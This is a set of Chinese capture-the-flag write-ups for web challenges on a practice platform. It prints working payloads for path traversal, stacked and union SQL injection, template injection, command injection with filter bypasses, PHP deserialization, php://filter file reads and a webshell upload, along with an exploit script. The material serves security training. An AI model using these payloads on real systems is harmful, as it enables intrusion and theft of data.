[HCTF 2018]WarmUp
index.php
Document
访问source.php
题目源码
"source.php","hint"=>"hint.php"];
----- A
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
----- A
----- B
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
----- B
----- C
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
----- C
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "
![](\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\")
";
}
?>
题目原型
phpMyAdmin文件包含漏洞
代码审计
0x00 include $_REQUEST['file']; 存在文件包含漏洞
0x01 A段检测传入的$page是否为白名单中的值
0x02 B段检测$page中?前部分是否为白名单中的值
0x03 C段先对 $_page进行url解码后再检测$_page中?前部分是否为白名单中的值
解题思路
0x00 构造如下基础结构的$_REQUEST['file']进行任意文件读取
payload: ?file=aaa/../bbb
如何理解aaa/../bbb
aaa/表示当前文件同级目录下的文件夹名(不检测该文件是否存在)
../bbb表示aaa/文件夹所在目录的父级目录下的文件名
father
├── aaa(文件夹 不一定要存在)
└── bbb(文件 一定要存在)
0x01 满足 emmm:checkFile($_REQUEST['file']) == True
解题方法
A段无法利用
令B段返回True
payload: ?file=source.php?/../../../../etc/passwd
通过回显知道payload正确,根据hint.php的提示得到flag
payload: ?file=source.php?/../../../../ffffllllaaaagggg
网上有人说include中不能有?,不清楚是什么情况,本人测试中没遇到问题
故也可以利用C段进行?的绕过
payload: ?file=source.php%253f/../../../../ffffllllaaaagggg
别忘了对%进行编码转换为 %25,因为url解析会自动进行url解码
疑问解析
之前有人有疑问表示不清楚目录穿越到底要穿多少层才能到根目录
其实多写几个../就可以了,因为一旦到根目录了,写几个../都还是在根目录上
[强网杯 2019]随便注
先进行简单测试,发现存在过滤
payload: ?inject=' union select 1,2,3--+
return : return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
测试中发现存在堆叠注入
查询当前数据库表结构
payload: ?inject=';show tables;desc `1919810931114514`;desc words;
【此处缺图片】
MariaDB [test]> desc `1919810931114514`; --A
+-------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+--------------+------+-----+---------+-------+
| flag | varchar(100) | NO | | NULL | |
+-------+--------------+------+-----+---------+-------+
1 row in set (0.01 sec)
MariaDB [test]> desc words; --B
+-------+-------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+-------------+------+-----+---------+-------+
| id | int(10) | NO | | NULL | |
| data | varchar(20) | NO | | NULL | |
+-------+-------------+------+-----+---------+-------+
2 rows in set (0.00 sec)
有一个细节在A和B处,这个细节在之后至关重要
A用全数字做表名,在使用时需要用反引号包裹,不然会产生错误,但如果半数字半字符则不需要
MariaDB [test]> desc 0d4y;
+-------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+--------------+------+-----+---------+-------+
| name | varchar(100) | NO | | NULL | |
+-------+--------------+------+-----+---------+-------+
1 row in set (0.01 sec)
MariaDB [test]> desc 1919810931114514;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1919810931114514' at line 1
题目有多种解法,一下进行三种解法的解析
重命名
通过测试可以猜测后台sql代码
$sql = select id, data from words where id = '{$id}';
解题思路
0x00 把1919810931114514改名为words,之后将1919810931114514中的字段flag改名为id
0x01 利用mysql特性构造' or '1得到flag
解题过程
payloaf: ?inject=';rename table `words` to `w`; rename table `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(255);desc words;
return :
array(6) {
[0]=>
string(2) "id"
[1]=>
string(12) "varchar(255)"
[2]=>
string(3) "YES"
[3]=>
string(0) ""
[4]=>
NULL
[5]=>
string(0) ""
}
回显可以判断修改成功
payload: ?inject=1' or '1
return :
array(1) {
[0]=>
string(42) "flag{287b6180-ddd5-43a7-9f38-4d38defd1013}"
}
将payload代入sql语句
$sql = select id, data from words where id = '1' or '1'; =>
$sql = select id, data from words where 1; =>
$sql = select id, data from words;
MySQL ALTER
用于修改数据表名或者修改数据表字段
删除,添加字段
MariaDB [test]> desc 0d4y;
+-------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+--------------+------+-----+---------+-------+
| name | varchar(255) | YES | | NULL | |
+-------+--------------+------+-----+---------+-------+
1 row in set (0.00 sec)
MariaDB [test]> alter table 0d4y add age int;
Query OK, 0 rows affected (0.01 sec)
Records: 0 Duplicates: 0 Warnings: 0
MariaDB [test]> desc 0d4y;
+-------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+--------------+------+-----+---------+-------+
| name | varchar(255) | YES | | NULL | |
| age | int(11) | YES | | NULL | |
+-------+--------------+------+-----+---------+-------+
2 rows in set (0.00 sec)
MariaDB [test]> alter table 0d4y drop age;
Query OK, 0 rows affected (0.01 sec)
Records: 0 Duplicates: 0 Warnings: 0
MariaDB [test]> desc 0d4y;
+-------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+--------------+------+-----+---------+-------+
| name | varchar(255) | YES | | NULL | |
+-------+--------------+------+-----+---------+-------+
1 row in set (0.00 sec)
修改字段
MariaDB [test]> desc 0d4y;
+-------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+--------------+------+-----+---------+-------+
| name | varchar(255) | YES | | NULL | |
+-------+--------------+------+-----+---------+-------+
1 row in set (0.00 sec)
MariaDB [test]> alter table 0d4y modify name varchar(100);
Query OK, 1 row affected (0.02 sec)
Records: 1 Duplicates: 0 Warnings: 0
MariaDB [test]> desc 0d4y;
+-------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+--------------+------+-----+---------+-------+
| name | varchar(100) | YES | | NULL | |
+-------+--------------+------+-----+---------+-------+
1 row in set (0.00 sec)
MariaDB [test]> alter table 0d4y change `name` `id` int;
Query OK, 1 row affected, 1 warning (0.02 sec)
Records: 1 Duplicates: 0 Warnings: 1
MariaDB [test]> desc 0d4y;
+-------+---------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+---------+------+-----+---------+-------+
| id | int(11) | YES | | NULL | |
+-------+---------+------+-----+---------+-------+
1 row in set (0.00 sec)
预处理
MySQL用户变量定义格式
set @v = xxx;
解题思路
0x00 将查询flag的sql语句预定义
0x01 执行预定义sql语句
解题过程
payload: ?inject=';set @s = concat('s', 'elect * from `1919810931114514`');prepare a from @s; execute a;
return : strstr($inject, "set") && strstr($inject, "prepare")
回显表示set与prepare不能同时存在
payload: ?inject=';Set @s = concat('s', 'elect * from `1919810931114514`');prepare a from @s;execute a;
return :
array(1) {
[0]=>
string(42) "flag{21e33093-12e2-4d51-852a-1db8bcab4ff6}"
}
MySQL PREPARE
PREPARE name from '[my sql sequece]'; //预定义SQL语句
EXECUTE name; //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE name; //删除预定义SQL语句
MariaDB [test]> prepare flag from "select * from 0d4y";
Query OK, 0 rows affected (0.00 sec)
Statement prepared
MariaDB [test]> execute flag;
+------+
| id |
+------+
| 0 |
+------+
1 row in set (0.00 sec)
MariaDB [test]> drop prepare flag;
Query OK, 0 rows affected (0.00 sec)
(未完成)[SUCTF 2019]EasySQL
[极客大挑战 2019]EasySQL
解题思路
猜测后台代码如下
$sql = SELECT * DROM database WHERE username = '$username' AND password = '$password';
解题方法
构造payload/check.php?username=admin' or 1=1 %23&password=1
[护网杯 2018]easy_tornado
题目提示
-- /flag.txt
flag in /fllllllllllllag
-- /welcome.txt
render
-- /hints.txt
md5(cookie_secret+md5(filename))
解题思路
0x00 render模板渲染暗示存在SSTI服务端模板注入攻击
0x01 handler.settings保存配置选项,包括cookie_secret
解题方法
访问文件时观察url
payload: /file?filename=/welcome.txt&filehash=1ee0dabf22eb0879a60444267ed3e063
存在文件读取点,访问/fllllllllllllag
页面跳转至/error?msg=Error
尝试SSTI
payload: /error?msg={{handler.settings}}
界面回显: {'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': '9c83fab7-1b67-404c-9aa8-69453579ac8c'}
exp.py
import hashlib
import requests
def md5(s):
md5 = hashlib.md5()
md5.update(s.encode())
return md5.hexdigest()
filename = "/fllllllllllllag"
cookie_secret = "9c83fab7-1b67-404c-9aa8-69453579ac8c"
filehash = md5(cookie_secret + md5(filename))
url = "http://93dc9c40-c8fc-4f2c-bce7-e28fae7437a6.node2.buuoj.cn.wetolink.com:82/file?filename=%s&filehash=%s" % (filename, filehash)
html = requests.get(url)
print(html.text)
[极客大挑战 2019]Havefun
解题思路
查看源码
代码审计
$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
echo 'Syc{cat_cat_cat_cat}';
}
解题方法
/?cat=dog
(未完成)[RoarCTF 2019]Easy Calc
$('#calc').submit(function(){
$.ajax({
url:"calc.php?num="+encodeURIComponent($("#content").val()),
type:'GET',
success:function(data){
$("#result").html(`
答案:${data}
`);
},
error:function(){
alert("这啥?算不来!");
}
})
return false;
})
访问calc.php得到后台源码
过滤的常用字符
`$^[]'"%20
过滤了单引号,在构造payload时用chr()代替
/calc.php? num=1;var_dump(scandir(chr(47))); // /f1agg
/calc.php? num=1;readfile(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103));
$payload = "/f1agg";
$arr = str_split($payload);
foreach ($arr as $a)
echo "chr(".ord($a).").";
//chr(47).chr(102).chr(49).chr(97).chr(103).chr(103).
payload中有一个很关键的地方 num 前面有一个空格,因为题中存在 WAF,对 num 的值进行了校验,直接传 payload,会返回这啥?算不来,于是利用php字符串解析特性绕过 WAF,此时 WAF 检测到的变量名为%20num,不为 num,不进行校验,但php存储的变量名为 num
利用PHP的字符串解析特性
PHP将查询字符串(在URL或正文中)转换为内部$_GET或的关联数组$_POST的过程中会将某些字符删除或用下划线代替
如果一个 IDS/IPS 或 WAF 中有一条规则是当 news_id 参数的值是一个非数字的值则拦截,那么我们就可以用以下语句绕过
%20news[id%00 // 这个变量名的值实际存储在 $_GET["news_id"] 中
parse_str()通常被自动应用于 get 、post 请求和 cookie 中,对 URL 传递入的查询字符串进行解析
通过如下 fuzz 了解parse_str()如何处理特殊字符
foreach(["{chr}foo_bar", "foo{chr}bar", "foo_bar{chr}"] as $k => $arg) {
for($i=0;$i<=255;$i++) {
parse_str(str_replace("{chr}",chr($i),$arg),$o);
if(isset($o["foo_bar"])) {
echo $arg." -> ".bin2hex(chr($i))." (".chr($i).")\n";
} // bin2hex 将字符转为16进制数
}
echo "\n";
}
{chr}foo_bar -> 20 ( )
{chr}foo_bar -> 26 (&)
{chr}foo_bar -> 2b (+)
foo{chr}bar -> 20 ( )
foo{chr}bar -> 2b (+)
foo{chr}bar -> 2e (.)
foo{chr}bar -> 5b ([)
foo{chr}bar -> 5f (_)
foo_bar{chr} -> 00 ()
foo_bar{chr} -> 26 (&)
foo_bar{chr} -> 3d (=)
[极客大挑战 2019]Secret File
Ctrl+U查看源码,发现./Archive_room.php;访问之后发现./action.php
访问后页面跳转到./end.php,进行抓包
action.php
访问secr3t.php
代码审计
secret
a处发现文件包含漏洞
解题方法
直接设置payload为/secr3t.php?file=flag.php无法显示flag,因此使用php://filter进行文件读取
/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
对输出的base64密文进行解密即可
0x01 php://filter
php://filter 是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取
[HCTF 2018]admin
[极客大挑战 2019]LoveSQL
解题思路
猜测后台代码如下
$sql = SELECT * DROM database WHERE username = '$username' AND password = '$password';
解题方法
构造payload/check.php?username=admin' or 1=1 %23&password=1
解密回显出password,md5查询无果,进行深度注入
查看列数
/check.php?username=admin' order by 3%23&password=1
确定注入点
/check.php?username=' union select 1,2,3%23&password=1
查看当前库表名
/check.php?username=' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema=database()),3%23&password=1
查看数据表l0ve1ysq1列名
/check.php?username=' union select 1, (select group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'),3%23&password=1
查看密码
/check.php?username=' union select 1, (select group_concat(password) from l0ve1ysq1),3%23&password=1
0x01 hackbar细节
如果直接输入#作为截断符无效,需进行urlencode转换为%23才可
[GXYCTF2019]Ping Ping Ping
题目提示
/?ip=
解题思路
存在远程命令执行漏洞,利用;截断后可进行文件读取
解题方法
查看当今文件夹
?ip=1;ls
PING 1 (0.0.0.1): 56 data bytes
flag.php
index.php
先查看index.php,了解后台逻辑后便于构造payload
?ip=1;cat index.php
/?ip= fxck your space!
waf空格,利用$IFS$9绕过
?ip=1;cat$IFS$9index.php
代码审计
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
die("fxck your symbol!");
} else if(preg_match("/ /", $ip)){
die("fxck your space!");
} else if(preg_match("/bash/", $ip)){
die("fxck your bash!");
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
}
$a = shell_exec("ping -c 4 ".$ip);
echo "";
print_r($a);
}
过滤了除$外大多数符号,空格,bash,还有一句比较有意思的正则表达式
preg_match("/.*f.*l.*a.*g.*/", $ip)
.*表示匹配任意字符任意次;代码的逻辑意思就是flag四个字母不能同顺序出现
构造payload,并查看源码
/?ip=1;a=g;cat$IFS$9fla$a.php
0x01 shell变量命名规范
变量名必须是以字母或下划线字符“_”开头,后面跟字母、数字或下划线字符。不要使用特殊字符命名变量,变量名和等号之间不能有空格
0x02 $IFS$9
$IFS内部域分隔符
shell的环境变量分为set和env,IFS是一种 set 变量,默认值是space, tab, newline
查看$IFS值
> echo "$IFS" | od -b
0000000 040 011 012 012
0000004
"040"是空格,"011"是Tab,"012"是换行,最后一个"012"是因为echo默认换行
$9
$1~$n表示添加到shell的各参数值;$0为当前文件名,$1是第1参数、$2是第2参数以此类推;$9此时为空值,在这里的作用为截断变量名,等同于{}(由于题目waf了大括号),即限定变量名的范围;如果没有进行截断的话,IFS会接着和后面的字符连接为变量名,无法构成完整的内部域分隔符,当然也不一定非要为9,还可以是1~8的其他数字
[极客大挑战 2019]PHP
题目提示
因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯
文件扫描
python3 dirsearch.py -u url -e php
-u url
-e 网站语言
下载/www.zip
代码审计
----index.php
----class.php
username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "NO!!!hacker!!!";
echo "You name is: ";
echo $this->username;echo "";
echo "You password is: ";
echo $this->password;echo "";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "hello my friend~~sorry i can't give you the flag!";
die();
}
}
}
?>
解题思路
0x00 password = 100
0x01 username = admin
0x02 绕过__wakeup函数的初始化
0x03 url编码
解题方法
echo urlencode(serialize(new Name('admin', '100')));
O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
-> 将2换3
O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
0x01 __wakeup() & __destruct() & __sleep()
__sleep()
在程序执行前,serialize() 函数会首先检查是否存在 __sleep().如果存在,__sleep()方法会先被调用,然后才执行序列化
__wakeup()
触发于unserilize()调用之前, 但当反序列化时的字符串所对应的对象的数目被修改,__wake()函数就不会被调用,从而实现绕过
__destruct()
在到对象的所有引用都被删除或者当对象被显式销毁时执行
0x02 对序列化结果进行url编码
因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上%00前缀字符串长度也包括所加前缀的长度
但如果不进行url编码直接使用payload,可以很明显发现%00字符消失,自然会导致失败
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
[ACTF2020 新生赛]Include
解题思路
/?file=flag.php猜测存在文件包含漏洞
解题方法
?file=php://filter/convert.base64-encode/resource=flag.php
[极客大挑战 2019]Knife
题目提示
eval($_POST["Syc"]);
解题方法
蚁剑连接
[极客大挑战 2019]Http
解题方法
查看源码,访问Secret.php,会连续出现三个要求,设置http头即可
[SUCTF 2019]CheckIn
[ACTF2020 新生赛]Exec
解题方法
target=;cd ..;cd ..;cd ..;cat flag
[极客大挑战 2019]BabySQL
解题思路
猜测后台代码如下
$sql = SELECT * DROM database WHERE username = '$username' AND password = '$password';
解题方法
构造payload/check.php?username=admin' or 1=1 %23&password=1,观察回显猜测过滤or,尝试双写绕过
/check.php?username=admin' oorr 1=1 %23&password=1
回显成功,进行深度注入,再根据回显进行双写
查看数据表名
?username=admin&password=' ununionion selselectect 1,(selselectect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()),3%23
查看b4bsql密码
?username=admin&password=' ununionion selselectect 1,(selselectect group_concat(passwoorrd) frfromom b4bsql),3%23
[CISCN2019 华北赛区 Day2 Web1]Hack World
[极客大挑战 2019]Upload
解题思路
上传含webshell的可执行文件
解题方法
创建图片马
trojan.gif
GIF89a
上传图片并更改文件后缀,由于php等一系列后缀被过滤,故使用phtml
POST /upload_file.php HTTP/1.1
Host: 338d1805-c3c7-4b7c-8dde-950a068bc645.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------12241674773713346554132597235
Content-Length: 399
Origin: http://338d1805-c3c7-4b7c-8dde-950a068bc645.node3.buuoj.cn
Connection: close
Referer: http://338d1805-c3c7-4b7c-8dde-950a068bc645.node3.buuoj.cn/
Upgrade-Insecure-Requests: 1
-----------------------------12241674773713346554132597235
Content-Disposition: form-data; name="file"; filename="trojan.phtml"
Content-Type: image/gif
GIF89a
-----------------------------12241674773713346554132597235
Content-Disposition: form-data; name="submit"
提交
-----------------------------12241674773713346554132597235--
文件上传至/upload文件夹,蚁剑连接
0x01图片文件头欺骗
GIF89a图形文件是一个根据图形交换格式(GIF)89a版(1989年7月发行)进行格式化之后的图形,再文件头部加上GIF89a,后台检测会判定为图片